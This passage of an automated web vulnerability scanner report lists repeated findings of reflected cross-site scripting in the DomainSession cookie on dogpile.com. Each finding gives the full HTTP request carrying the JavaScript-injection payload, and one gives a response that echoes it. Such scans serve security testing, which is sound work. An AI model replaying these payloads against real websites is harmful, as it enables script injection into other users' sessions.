Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com172f4"-alert(1)-"a0abe5fa114; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

2.131. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da425"-alert(1)-"23f7cc263dd was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.comda425"-alert(1)-"23f7cc263dd; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response (redirected)

2.132. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6232"-alert(1)-"0b9efa05740 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.coma6232"-alert(1)-"0b9efa05740; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

2.133. http://www.dogpile.com/dogpile_other/ws/index [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ae4"-alert(1)-"eecc2711024 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://dogpile.com/dogpile/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=9ca43f5d994646fab1d4c16a3af0cb01&ActionId=bc343352182e410c9000c16a3af0cb01&CookieDomain=.dogpile.com21ae4"-alert(1)-"eecc2711024; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:56 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

2.134. http://www.dogpile.com/dogpile_other/ws/index [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37a9f"-alert(1)-"9ff850e7c98 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com37a9f"-alert(1)-"9ff850e7c98; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response (redirected)

2.135. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f72c"-alert(1)-"f359c353bfe was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:42 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=943c5c3ef0f147488180c16a3af0cb01&ActionId=576fec2bf7284bfebe21c16a3af0cb01&CookieDomain=.dogpile.com8f72c"-alert(1)-"f359c353bfe

Response (redirected)

2.136. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d91bc"-alert(1)-"8a6ce0e863e was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:43 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=576fec2bf7284bfebe21c16a3af0cb01&ActionId=57e9f6a7a2d64328b77bc16a3af0cb01&CookieDomain=.dogpile.comd91bc"-alert(1)-"8a6ce0e863e

Response

2.137. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24062"-alert(1)-"3197989eac9 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:31 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=e0a2585a54c44613a05fc16a3af0cb01&ActionId=cbef8ee057aa45668e6fc16a3af0cb01&CookieDomain=.dogpile.com24062"-alert(1)-"3197989eac9

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 17:14:46 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=cbef8ee057aa45668e6fc16a3af0cb01&ActionId=69e4663f27db43c59583c16a3af0cb01&CookieDomain=.dogpile.com24062"-alert(1)-"3197989eac9; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:46 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:46 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:46 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 51063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
ansactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=cbef8ee057aa45668e6fc16a3af0cb01&ActionId=69e4663f27db43c59583c16a3af0cb01&CookieDomain=.dogpile.com24062"-alert(1)-"3197989eac9; expires=Fri, 01 Apr 2011 17:34:46 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.138. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 868e6"-alert(1)-"815bb4494be was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

POST /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true
Content-Length: 2186
Cache-Control: max-age=0
Origin: http://www.dogpile.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:12 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com868e6"-alert(1)-"815bb4494be

__VIEWSTATE=%2FwEPDwULLTEwNzYxNjAxNjBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBR5pY2VQYWdlJFNlYXJjaEJveFRvcCRxa3dzdWJtaXQFLmljZVBhZ2UkU2VhcmNoQm94VG9wJEFkdmFuY2VkU2VhcmNoV2ViJGluY2x1ZGUFLmljZV
...[SNIP]...

Response (redirected)

2.139. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17e70"-alert(1)-"8009d3e9d2 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:13 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=afded22df52249fea4b3c16a3af0cb01&ActionId=03e0e226b781481fa972c16a3af0cb01&CookieDomain=.dogpile.com17e70"-alert(1)-"8009d3e9d2

Response (redirected)

2.140. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5784a"-alert(1)-"4be09a1635c was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:52 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301678093005; wsRecent=site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=8a9366cfe41848d795bec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=c1a8f04152fd49d4bbd5c16a3af0cb01&ActionId=afded22df52249fea4b3c16a3af0cb01&CookieDomain=.dogpile.com5784a"-alert(1)-"4be09a1635c

Response (redirected)

2.141. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35970"-alert(1)-"f277aa05b72 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:16 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com35970"-alert(1)-"f277aa05b72

Response (redirected)

2.142. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93152"-alert(1)-"816df919a4f was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
